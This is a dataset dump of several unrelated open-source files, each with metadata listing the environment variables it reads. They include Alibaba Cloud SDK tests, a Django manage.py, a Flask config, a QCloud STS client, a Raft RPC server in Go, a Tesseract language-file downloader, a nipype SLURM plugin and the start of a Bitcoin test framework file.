client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_config_default(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
def test_call_rpc_request_with_key_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id="BadAccessKeyId",
access_key_secret=self.access_key_secret)
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "Ecs")
self.assertEqual(e.exception.http_status, 404)
self.assertEqual(e.exception.endpoint, "ecs-cn-hangzhou.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAccessKeyId.NotFound")
self.assertEqual(e.exception.error_message, "Specified access key is not found.")
def test_call_roa_request_with_key_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id="BadAccessKeyId",
access_key_secret=self.access_key_secret)
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "ROS")
self.assertEqual(e.exception.http_status, 404)
self.assertEqual(e.exception.endpoint, "ros.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAction.NotFound")
self.assertEqual(e.exception.error_message,
"Specified api is not found, please check your url and method.")
def test_call_rpc_request_with_secret_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id=self.access_key_id,
access_key_secret="BadAccessKeySecret")
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "Ecs")
self.assertEqual(e.exception.http_status, 400)
self.assertEqual(e.exception.endpoint, "ecs-cn-hangzhou.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAccessKeySecret")
self.assertEqual(e.exception.error_message,
"The AccessKeySecret is incorrect. "
"Please check your AccessKeyId and AccessKeySecret.")
def test_call_roa_request_with_secret_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id=self.access_key_id,
access_key_secret="BadAccessKeySecret")
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "ROS")
self.assertEqual(e.exception.http_status, 404)
self.assertEqual(e.exception.endpoint, "ros.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAction.NotFound")
self.assertEqual(e.exception.error_message,
"Specified api is not found, please check your url and method.")
def test_call_request_with_env_error(self):
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
client_config = ClientConfig(region_id=self.region_id)
with self.assertRaises(PartialCredentialsException) as e:
DefaultChainedCredentialsProvider(client_config)
self.assertEqual(e.exception.error_message,
"Partial credentials found in env, ALIBABA_CLOUD_ACCESS_KEY_SECRET is empty")
| []
| []
| [
"ALIBABA_CLOUD_ACCESS_KEY_ID",
"ALIBABA_CLOUD_ROLE_NAME",
"ALIBABA_CLOUD_ACCESS_KEY_SECRET"
]
| [] | ["ALIBABA_CLOUD_ACCESS_KEY_ID", "ALIBABA_CLOUD_ROLE_NAME", "ALIBABA_CLOUD_ACCESS_KEY_SECRET"] | python | 3 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'NetAutoMgmt.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
codebox/conf.py | """
codebox.conf
~~~~~~~~~~~
:copyright: (c) 2011 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import os
import os.path
import sys
import urlparse
class Config(object):
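# Settings are read from the process environment at import time; the second
# argument to os.environ.get is the fallback used when a variable is unset.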
DEBUG = os.environ.get('DEBUG', False)
TESTING = False
LOG_LEVEL = os.environ.get('LOG_LEVEL', 'DEBUG')
SECRET_KEY = os.environ.get('SECRET_KEY', '\x89\x1d\xec\x8eJ\xda=C`\xf3<X\x81\xff\x1e\r{+\x1b\xe1\xd1@ku')
REDIS_DB = 0
JANRAIN_API_KEY = os.environ.get('JANRAIN_API_KEY')
DOMAIN_BLACKLIST = ['gmail.com', 'hotmail.com', 'live.com', 'msn.com', 'yahoo.com', 'googlemail.com', 'facebookmail.com']
MAIL_SERVER = 'smtp.sendgrid.net'
MAIL_PORT = 25
MAIL_USERNAME = os.environ.get('SENDGRID_USERNAME')
MAIL_PASSWORD = os.environ.get('SENDGRID_PASSWORD')
MAIL_USE_TLS = True
MAIL_DOMAIN = os.environ.get('SENDGRID_DOMAIN', 'codebox.cc')
DEFAULT_MAIL_SENDER = '[email protected]'
if os.environ.has_key('SENTRY_DSN'):
try:
import raven
raven.load(os.environ['SENTRY_DSN'], Config.__dict__)
except:
print "Unexpected error:", sys.exc_info()
if os.environ.has_key('REDISTOGO_URL'):
# 'redis://username:[email protected]:6789'
urlparse.uses_netloc.append('redis')
url = urlparse.urlparse(os.environ['REDISTOGO_URL'])
Config.REDIS_PASSWORD = url.password
Config.REDIS_HOST = url.hostname
Config.REDIS_PORT = url.port
class TestingConfig(Config):
REDIS_DB = 9
TESTING = True
| []
| []
| [
"REDISTOGO_URL",
"LOG_LEVEL",
"SENDGRID_DOMAIN",
"JANRAIN_API_KEY",
"SECRET_KEY",
"SENDGRID_PASSWORD",
"SENDGRID_USERNAME",
"SENTRY_DSN",
"DEBUG"
]
| [] | ["REDISTOGO_URL", "LOG_LEVEL", "SENDGRID_DOMAIN", "JANRAIN_API_KEY", "SECRET_KEY", "SENDGRID_PASSWORD", "SENDGRID_USERNAME", "SENTRY_DSN", "DEBUG"] | python | 9 | 0 | |
sts/client.go | package sts
import (
"os"
"github.com/howardshaw/qcloudapi-sdk-go/common"
)
const (
StsHost = "sts.api.qcloud.com"
StsPath = "/v2/index.php"
)
type Client struct {
*common.Client
}
func NewClient(credential common.CredentialInterface, opts common.Opts) (*Client, error) {
if opts.Host == "" {
opts.Host = StsHost
}
if opts.Path == "" {
opts.Path = StsPath
}
client, err := common.NewClient(credential, opts)
if err != nil {
return &Client{}, err
}
return &Client{client}, nil
}
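// NewClientFromEnv builds a Client from the QCloudSecretId, QCloudSecretKey,
// QCloudStsAPIRegion, QCloudStsAPIHost and QCloudStsAPIPath environment
// variables; empty host/path values fall back to the StsHost/StsPath defaults
// applied in NewClient above.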
func NewClientFromEnv() (*Client, error) {
secretId := os.Getenv("QCloudSecretId")
secretKey := os.Getenv("QCloudSecretKey")
region := os.Getenv("QCloudStsAPIRegion")
host := os.Getenv("QCloudStsAPIHost")
path := os.Getenv("QCloudStsAPIPath")
return NewClient(
common.Credential{
secretId,
secretKey,
},
common.Opts{
Region: region,
Host: host,
Path: path,
},
)
}
| [
"\"QCloudSecretId\"",
"\"QCloudSecretKey\"",
"\"QCloudStsAPIRegion\"",
"\"QCloudStsAPIHost\"",
"\"QCloudStsAPIPath\""
]
| []
| [
"QCloudStsAPIHost",
"QCloudStsAPIPath",
"QCloudSecretId",
"QCloudSecretKey",
"QCloudStsAPIRegion"
]
| [] | ["QCloudStsAPIHost", "QCloudStsAPIPath", "QCloudSecretId", "QCloudSecretKey", "QCloudStsAPIRegion"] | go | 5 | 0 | |
part1/server.go | // Server container for a Raft Consensus Module. Exposes Raft to the network
// and enables RPCs between Raft peers.
//
// Eli Bendersky [https://eli.thegreenplace.net]
// This code is in the public domain.
package raft
import (
"fmt"
"log"
"math/rand"
"net"
"net/rpc"
"os"
"sync"
"time"
)
// Server wraps a raft.ConsensusModule along with a rpc.Server that exposes its
// methods as RPC endpoints. It also manages the peers of the Raft server. The
// main goal of this type is to simplify the code of raft.Server for
// presentation purposes. raft.ConsensusModule has a *Server to do its peer
// communication and doesn't have to worry about the specifics of running an
// RPC server.
type Server struct {
mu sync.Mutex
serverId int
peerIds []int
cm *ConsensusModule
rpcProxy *RPCProxy
rpcServer *rpc.Server
listener net.Listener
peerClients map[int]*rpc.Client
ready <-chan interface{}
quit chan interface{}
wg sync.WaitGroup
}
func NewServer(serverId int, peerIds []int, ready <-chan interface{}) *Server {
s := new(Server)
s.serverId = serverId
s.peerIds = peerIds
s.peerClients = make(map[int]*rpc.Client)
s.ready = ready
s.quit = make(chan interface{})
return s
}
func (s *Server) Serve() {
s.mu.Lock()
s.cm = NewConsensusModule(s.serverId, s.peerIds, s, s.ready)
// Create a new RPC server and register a RPCProxy that forwards all methods
// to s.cm
s.rpcServer = rpc.NewServer()
s.rpcProxy = &RPCProxy{cm: s.cm}
s.rpcServer.RegisterName("ConsensusModule", s.rpcProxy)
var err error
s.listener, err = net.Listen("tcp", ":0")
if err != nil {
log.Fatal(err)
}
log.Printf("[%v] listening at %s", s.serverId, s.listener.Addr())
s.mu.Unlock()
s.wg.Add(1)
go func() {
defer s.wg.Done()
for {
conn, err := s.listener.Accept()
if err != nil {
select {
case <-s.quit:
return
default:
log.Fatal("accept error:", err)
}
}
s.wg.Add(1)
go func() {
s.rpcServer.ServeConn(conn)
s.wg.Done()
}()
}
}()
}
// DisconnectAll closes all the client connections to peers for this server.
func (s *Server) DisconnectAll() {
s.mu.Lock()
defer s.mu.Unlock()
for id := range s.peerClients {
if s.peerClients[id] != nil {
s.peerClients[id].Close()
s.peerClients[id] = nil
}
}
}
// Shutdown closes the server and waits for it to shut down properly.
func (s *Server) Shutdown() {
s.cm.Stop()
close(s.quit)
s.listener.Close()
s.wg.Wait()
}
func (s *Server) GetListenAddr() net.Addr {
s.mu.Lock()
defer s.mu.Unlock()
return s.listener.Addr()
}
func (s *Server) ConnectToPeer(peerId int, addr net.Addr) error {
s.mu.Lock()
defer s.mu.Unlock()
if s.peerClients[peerId] == nil {
client, err := rpc.Dial(addr.Network(), addr.String())
if err != nil {
return err
}
s.peerClients[peerId] = client
}
return nil
}
// DisconnectPeer disconnects this server from the peer identified by peerId.
func (s *Server) DisconnectPeer(peerId int) error {
s.mu.Lock()
defer s.mu.Unlock()
if s.peerClients[peerId] != nil {
err := s.peerClients[peerId].Close()
s.peerClients[peerId] = nil
return err
}
return nil
}
// TODO: why 'args' and 'reply' as empty interface?
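// (args and reply are empty interfaces to mirror net/rpc's Client.Call
// signature, so any request/reply struct can be forwarded without this type
// knowing about it.)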
func (s *Server) Call(id int, serviceMethod string, args interface{}, reply interface{}) error {
s.mu.Lock()
peer := s.peerClients[id]
s.mu.Unlock()
// If this is called after shutdown (where client.Close is called), it will
// return an error.
if peer == nil {
return fmt.Errorf("call client %d after it's closed", id)
} else {
return peer.Call(serviceMethod, args, reply)
}
}
// RPCProxy is a trivial pass-thru proxy type for ConsensusModule's RPC methods.
// It's useful for:
// - Simulating a small delay in RPC transmission.
// - Avoiding running into https://github.com/golang/go/issues/19957
// - Simulating possible unreliable connections by delaying some messages
// significantly and dropping others when RAFT_UNRELIABLE_RPC is set.
type RPCProxy struct {
cm *ConsensusModule
}
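// A rough sketch of exercising the unreliable paths below: set the variable to
// any non-empty value before running the tests, for example
// RAFT_UNRELIABLE_RPC=1 go test -race ./... (the exact test invocation is an
// assumption; only the non-empty environment variable matters).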
// NOTE: this is just a wrapper for ConsensusModule.RequestVote.
// Add some delays or simulate flaky network by dropping the msg
func (rpp *RPCProxy) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) error {
if len(os.Getenv("RAFT_UNRELIABLE_RPC")) > 0 {
dice := rand.Intn(10)
if dice == 9 {
rpp.cm.dlog("drop RequestVote")
return fmt.Errorf("RPC failed")
} else if dice == 8 {
rpp.cm.dlog("delay RequestVote")
time.Sleep(75 * time.Millisecond)
}
} else {
time.Sleep(time.Duration(1+rand.Intn(5)) * time.Millisecond)
}
return rpp.cm.RequestVote(args, reply)
}
func (rpp *RPCProxy) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) error {
if len(os.Getenv("RAFT_UNRELIABLE_RPC")) > 0 {
dice := rand.Intn(10)
if dice == 9 {
rpp.cm.dlog("drop AppendEntries")
return fmt.Errorf("RPC failed")
} else if dice == 8 {
rpp.cm.dlog("delay AppendEntries")
time.Sleep(75 * time.Millisecond)
}
} else {
time.Sleep(time.Duration(1+rand.Intn(5)) * time.Millisecond)
}
return rpp.cm.AppendEntries(args, reply)
}
| [
"\"RAFT_UNRELIABLE_RPC\"",
"\"RAFT_UNRELIABLE_RPC\""
]
| []
| [
"RAFT_UNRELIABLE_RPC"
]
| [] | ["RAFT_UNRELIABLE_RPC"] | go | 1 | 0 | |
tessdata_downloader.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""Downloader for tesseract language files."""
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import os
import sys
import requests
# import urllib.request
__author__ = "Zdenko Podobny <[email protected]>"
__copyright__ = "Copyright 2018 Zdenko Podobny"
__version__ = "1.2"
__license__ = "Apache license 2"
__date__ = "07/11/2018"
PROJECT_URL = 'https://api.github.com/repos/tesseract-ocr/'
REPOSITORIES = ['tessdata', 'tessdata_fast', 'tessdata_best']
PROXIES = None
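# Illustrative invocations (they assume network access to the GitHub API):
#   python3 tessdata_downloader.py -lt
#   python3 tessdata_downloader.py -r tessdata_best -l eng -o ./tessdata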
def get_repo_tags(project_url, repository):
"""Get list of tags for repository."""
tags_url = '{0}{1}/tags'.format(project_url, repository)
r = requests.get(tags_url, proxies=PROXIES)
tags = dict()
for item in r.json():
tags[item['name']] = item['commit']['sha']
return tags
def get_repository_lof(project_url, repository, tag):
"""Get list of files for repository."""
if tag == "the_latest":
sha = get_sha_of_tag(repository)
else:
sha = get_sha_of_tag(repository, tag)
if not sha:
print("Unknown tag '{0}' for repository '{1}'".format(
tag, repository))
return None
tree_url = '{0}{1}/git/trees/{2}?recursive=1'.format(project_url,
repository,
sha)
tree_content = requests.get(tree_url, proxies=PROXIES).json()
if isinstance(tree_content, dict):
tree = tree_content.get('tree')
elif isinstance(tree_content, list):
tree = tree_content
else:
print('Unexpected structure {0}'.format(type(tree_content)))
return False
list_of_files = []
for item in tree:
if item['mode'] == '100644': # list only files
list_of_files.append((item['path'], item['size']))
# list_of_files.append({item['path']: (item['size'], item['sha'])})
return list_of_files
def check_if_file_exists(filename, file_size=0):
"""Check if file exists, optionally with expected size."""
if os.path.isfile(filename):
# File exists
local_size = os.stat(filename).st_size
if file_size:
if file_size == local_size:
# File with expected size exists
return True
else:
# File size is different => not exists
print('File "{0}" exists, but it size differ to github. It '
'will be overwritten.'.format(filename))
return False
else:
# File size isn't tested
return True
else:
# File doesn't exist
return False
def download_file(file_url, filename, file_size, output_dir):
"""Download file."""
req = requests.get(
file_url,
allow_redirects=True,
stream=True,
headers={"Accept": "application/vnd.github.v3.raw"},
proxies=PROXIES)
content_length = req.headers.get('Content-Length')
if content_length:
file_size = int(content_length)
block_size = 4096
kb_size = int(file_size / 1024)
dl = 0
output = os.path.join(output_dir, filename)
if check_if_file_exists(output, file_size):
answer = input("Warning: File '{0}' with expected filesize {1} "
"already exist!\nDownload again? [y/N] "
.format(output, file_size))
if answer.lower() != 'y':
print('Quitting...')
return
with open(output, "wb") as file:
for chunk in req.iter_content(chunk_size=block_size):
if chunk:
dl += len(chunk)
file.write(chunk)
done = int(20 * dl / file_size)
sys.stdout.write('\rDownloading {0:21} [{1}{2}] {3}KB'
.format(filename, '=' * done,
' ' * (20 - done),
kb_size))
sys.stdout.flush()
sys.stdout.write('\n')
download_size = os.stat(output).st_size
if file_size != download_size:
print("Warning: download was not successful! Filesize of downloaded"
" file {0} is {1}, but github filesize is {2}."
.format(filename, download_size, file_size))
else:
print("Download was successful.")
def list_of_repos():
"""List of know tesseract traineddata repositories."""
print("Available tesseract traineddata repositories are:")
for repository in REPOSITORIES:
print(' "{}"'.format(repository))
def get_list_of_tags():
"""Retrieve tags from know repositories."""
project_url = PROJECT_URL
for repository in REPOSITORIES:
tags = get_repo_tags(project_url, repository)
if tags:
print("Following tags were found for repository "
'"{0}":'.format(repository))
for tag in tags:
print(' "{}"'.format(tag))
else:
print(
'No tag was found for repository "{0}"!'.format(repository))
def get_sha_of_tag(repository, tag=None, project_url=PROJECT_URL):
"""Get sha for tag."""
sha = None
if not tag:
url = '{0}{1}/git/refs/heads/main'.format(project_url, repository)
else:
url = '{0}{1}/tags'.format(project_url, repository)
r = requests.get(url, proxies=PROXIES)
content = r.json()
if isinstance(content, dict):
sha = content['object']['sha']
elif isinstance(content, list):
for item in content:
if tag and item['name'] == tag:
sha = item['commit']['sha']
return sha
def display_repo_lof(repository, tag):
"""Retrieving list of files from repository."""
project_url = PROJECT_URL
tag_sha = None
if repository not in REPOSITORIES:
print("Unknown repository '{0}'".format(repository))
print()
list_of_repos()
return
tree_content = get_repository_lof(project_url, repository, tag)
if tree_content:
print("\nFollowing files were found for repository"
" '{0}' and tag '{1}':".format(repository, tag))
for item, size in tree_content:
print("{0}, size: {1}".format(item, size))
else:
print('\nNo file was found for repository {0} and {1}!'.format(
repository, tag_sha))
def get_lang_files(repository, tag, lang, output_dir):
"""Download language files from repository based on tag."""
if ".traineddata" in lang:
lang = lang.replace('.traineddata', '')
print('Start of getting information for download of files for '
'{0}:'.format(lang))
if tag == "the_latest":
tag_sha = get_sha_of_tag(repository)
else:
tag_sha = get_sha_of_tag(repository, tag)
if not tag_sha:
print("Unknown tag '{0}' for repository '{1}'".format(
tag, repository))
return None
print("Retrieving file(s) from repository '{0}', tagged as '{1}'"
.format(repository, tag))
tree_url = '{0}{1}/git/trees/{2}?recursive=1'.format(PROJECT_URL,
repository,
tag_sha)
tree_content = requests.get(tree_url, proxies=PROXIES).json()
if isinstance(tree_content, dict):
tree = tree_content.get('tree')
elif isinstance(tree_content, list):
tree = tree_content
else:
print('Unexpected structure {0}'.format(type(tree_content)))
return False
not_found = True
if not tree:
print('No output for url "{0}" (repository "{1}")'
.format(tree_url, repository))
return False
for item in tree:
if item['mode'] == '040000':
continue # skip directories
filename = item['path']
code = filename.split('.')[0]
if lang == code:
file_url = item.get('git_url')
if not file_url:
file_url = item.get('download_url')
if not file_url:
file_url = item.get('url')
if item.get('type') in ("dir", "tree", "submodule"):
print(
'"{}" is directory - ignoring...'.format(item['path']))
continue
if item['size'] == 0:
print(
'"{}" has 0 length - skipping...'.format(item['path']))
continue
if '/' in filename:
filename = filename.split('/')[1]
download_file(file_url, filename, item['size'], output_dir)
not_found = False
if not_found:
print('Could not find any file for "{}"'.format(lang))
def is_directory_writable(directory):
"""Check if directory exist and is writable.
Return False if it is not possible to create file there.
"""
if not os.path.exists(directory):
print('Output directory "{0}" does not exists! Please create it '
'first.'.format(directory))
return False
elif not os.path.isdir(directory):
print('"{0}" is not directory!'.format(directory))
return False
elif not os.access(directory, os.W_OK):
print('Can not write to directory "{}"!\nPlease check if you '
'have sufficient rights.'.format(directory))
return False
return True
def test_proxy_connection(test_proxies):
"""Test if proxy information is correct."""
repo_name = 'tessdata'
try:
test_r = requests.get(PROJECT_URL + repo_name, proxies=test_proxies)
except requests.exceptions.ProxyError as error:
print('Connection is refused {0}'.format(error), type(error))
return False
if test_r.json().get('name') == repo_name:
return True
return False
def get_proxy_from_file():
"""Try to import proxy info from local file."""
try:
# try to look for local_settings.py with info about proxy
from local_settings import PROXIES
if PROXIES['https'] == 'http://user:password@proxy:port':
# ignore example proxy setting
proxies = None
elif test_proxy_connection(PROXIES):
proxies = PROXIES
print("Loading Proxy information from file 'local_settings.py'...")
return proxies
except ImportError:
return None
def get_proxies(proxy_server, proxy_user):
"""Process information about proxies."""
proxies = None
proxy_template = 'http://{0}@{1}'.format(proxy_user, proxy_server)
if proxy_server and proxy_user: # prefer to use program arguments
proxies = {'http': proxy_template,
'https': proxy_template}
elif not proxies:
proxies = get_proxy_from_file()
else:
# TODO: check proxy format
# TODO: user auth format
if not proxy_server:
pass
# check for system proxy
if not proxy_user:
pass
# proxy_user
# system_proxy = urllib.request.getproxies()
if proxies and not test_proxy_connection(proxies):
return -1
return proxies
def main():
"""Main loop."""
global PROXIES
desc = "Tesseract traineddata downloader {}".format(__version__)
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
"-v", "--version", action='store_true',
help="Print version info")
parser.add_argument(
"-o",
"--output_dir",
default=None,
help="""Directory to store downloaded file.\n
Default: TESSDATA_PREFIX environment variable if set,
otherwise current directory""")
parser.add_argument(
"-r",
"--repository",
type=str,
choices=REPOSITORIES,
default="tessdata_best",
help="Specify repository for download.\nDefault: 'tessdata_best'")
parser.add_argument(
"-lr",
"--list_repos",
action='store_true',
help="Display list of repositories")
parser.add_argument(
"-t",
"--tag",
type=str,
default="the_latest",
help="Specify repository tag for download.\n"
"Default: 'the_latest' (e.g. the latest commit)")
parser.add_argument(
"-lt",
"--list_tags",
action='store_true',
help="Display list of tag for know repositories")
parser.add_argument(
"-lof",
"--list_of_files",
action='store_true',
help="Display list of files for specified repository and tag "
"(e.g. argument -r and -t must be used with this argument)")
parser.add_argument(
"-l", "--lang", help="Language or data code of traineddata.")
parser.add_argument(
"-U",
"--proxy-user",
type=str,
default=None,
help="<user:password> Proxy user and password.")
parser.add_argument(
"-x",
"--proxy",
type=str,
default=None,
help="host[:port] for https. Use this proxy. If not specified "
"system proxy will be used by default.")
args = parser.parse_args()
# show help if no arguments provided
if not len(sys.argv) > 1:
parser.print_help()
if args.version:
print(desc, __date__)
print()
print("Author:", __author__)
print("Copyright:", __copyright__)
print("License:", __license__)
sys.exit(0)
if not args.output_dir and 'TESSDATA_PREFIX' in os.environ:
args.output_dir = os.environ['TESSDATA_PREFIX']
elif not args.output_dir:
args.output_dir = "."
PROXIES = get_proxies(args.proxy, args.proxy_user)
if PROXIES == -1:
print("Wrong proxy information provided!")
sys.exit(1)
if args.list_repos:
list_of_repos()
sys.exit(0)
if args.list_tags:
get_list_of_tags()
sys.exit(0)
if args.list_of_files:
display_repo_lof(args.repository, args.tag)
sys.exit(0)
if not is_directory_writable(args.output_dir):
sys.exit(0)
if args.lang:
get_lang_files(args.repository, args.tag, args.lang,
args.output_dir)
if __name__ == '__main__':
main()
| []
| []
| [
"TESSDATA_PREFIX"
]
| [] | ["TESSDATA_PREFIX"] | python | 1 | 0 | |
nipype/pipeline/plugins/slurm.py | '''
Created on Aug 2, 2013
@author: chadcumba
Parallel workflow execution with SLURM
'''
import os
import re
from time import sleep
from ... import logging
from ...interfaces.base import CommandLine
from .base import SGELikeBatchManagerBase, logger
iflogger = logging.getLogger('nipype.interface')
class SLURMPlugin(SGELikeBatchManagerBase):
'''
Execute using SLURM
The plugin_args input to run can be used to control the SLURM execution.
Currently supported options are:
- template : template to use for batch job submission
- sbatch_args: arguments to prepend to the sbatch call
'''
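# A hedged usage sketch (option values are assumptions for illustration only):
#   workflow.run(plugin='SLURM',
#                plugin_args={'sbatch_args': '--time=00:30:00 --mem=4G',
#                             'max_tries': 3})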
def __init__(self, **kwargs):
template = "#!/bin/bash"
self._retry_timeout = 2
self._max_tries = 2
self._template = template
self._sbatch_args = None
self._jobid_re = "Submitted batch job ([0-9]*)"
if 'plugin_args' in kwargs and kwargs['plugin_args']:
if 'retry_timeout' in kwargs['plugin_args']:
self._retry_timeout = kwargs['plugin_args']['retry_timeout']
if 'max_tries' in kwargs['plugin_args']:
self._max_tries = kwargs['plugin_args']['max_tries']
if 'jobid_re' in kwargs['plugin_args']:
self._jobid_re = kwargs['plugin_args']['jobid_re']
if 'template' in kwargs['plugin_args']:
self._template = kwargs['plugin_args']['template']
if os.path.isfile(self._template):
with open(self._template) as f:
self._template = f.read()
if 'sbatch_args' in kwargs['plugin_args']:
self._sbatch_args = kwargs['plugin_args']['sbatch_args']
self._pending = {}
super(SLURMPlugin, self).__init__(self._template, **kwargs)
def _is_pending(self, taskid):
try:
res = CommandLine(
'squeue',
args=' '.join(['-j', '%s' % taskid]),
resource_monitor=False,
terminal_output='allatonce').run()
return res.runtime.stdout.find(str(taskid)) > -1
except RuntimeError as e:
if any(ss in str(e) for ss
in ['Socket timed out', 'not available at the moment']):
# do not raise error and allow recheck
logger.warning(
"SLURM timeout encountered while checking job status,"
" treating job %d as pending", taskid
)
return True
if 'Invalid job id' not in str(e):
raise(e)
return False
def _submit_batchtask(self, scriptfile, node):
"""
This is more or less the _submit_batchtask from sge.py with flipped
variable names, different command line switches, and different output
formatting/processing
"""
cmd = CommandLine(
'sbatch',
environ=dict(os.environ),
resource_monitor=False,
terminal_output='allatonce')
path = os.path.dirname(scriptfile)
sbatch_args = ''
if self._sbatch_args:
sbatch_args = self._sbatch_args
if 'sbatch_args' in node.plugin_args:
if 'overwrite' in node.plugin_args and\
node.plugin_args['overwrite']:
sbatch_args = node.plugin_args['sbatch_args']
else:
sbatch_args += (" " + node.plugin_args['sbatch_args'])
if '-o' not in sbatch_args:
sbatch_args = '%s -o %s' % (sbatch_args,
os.path.join(path, 'slurm-%j.out'))
if '-e' not in sbatch_args:
sbatch_args = '%s -e %s' % (sbatch_args,
os.path.join(path, 'slurm-%j.out'))
if node._hierarchy:
jobname = '.'.join((dict(os.environ)['LOGNAME'], node._hierarchy,
node._id))
else:
jobname = '.'.join((dict(os.environ)['LOGNAME'], node._id))
jobnameitems = jobname.split('.')
jobnameitems.reverse()
jobname = '.'.join(jobnameitems)
cmd.inputs.args = '%s -J %s %s' % (sbatch_args, jobname, scriptfile)
oldlevel = iflogger.level
iflogger.setLevel(logging.getLevelName('CRITICAL'))
tries = 0
while True:
try:
result = cmd.run()
except Exception as e:
if tries < self._max_tries:
tries += 1
# sleep 2 seconds and try again.
sleep(self._retry_timeout)
else:
iflogger.setLevel(oldlevel)
raise RuntimeError('\n'.join(
(('Could not submit sbatch task'
' for node %s') % node._id, str(e))))
else:
break
logger.debug('Ran command ({0})'.format(cmd.cmdline))
iflogger.setLevel(oldlevel)
# retrieve taskid
lines = [line for line in result.runtime.stdout.split('\n') if line]
taskid = int(re.match(self._jobid_re, lines[-1]).groups()[0])
self._pending[taskid] = node.output_dir()
logger.debug('submitted sbatch task: %d for node %s' % (taskid,
node._id))
return taskid
| []
| []
| []
| [] | [] | python | 0 | 0 | |
test/functional/test_framework/test_framework.py | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
import argparse
import configparser
from enum import Enum
import logging
import os
import pdb
import shutil
import sys
import tempfile
import time
from .authproxy import JSONRPCException
from . import coverage
from .test_node import TestNode
from .mininode import NetworkThread
from .util import (
assert_equal,
check_json_precision,
connect_nodes_bi,
disconnect_nodes,
get_datadir_path,
initialize_datadir,
MAX_NODES,
p2p_port,
PortSeed,
rpc_port,
set_node_times,
sync_blocks,
sync_mempools,
)
class TestStatus(Enum):
PASSED = 1
FAILED = 2
SKIPPED = 3
TEST_EXIT_PASSED = 0
TEST_EXIT_FAILED = 1
TEST_EXIT_SKIPPED = 77
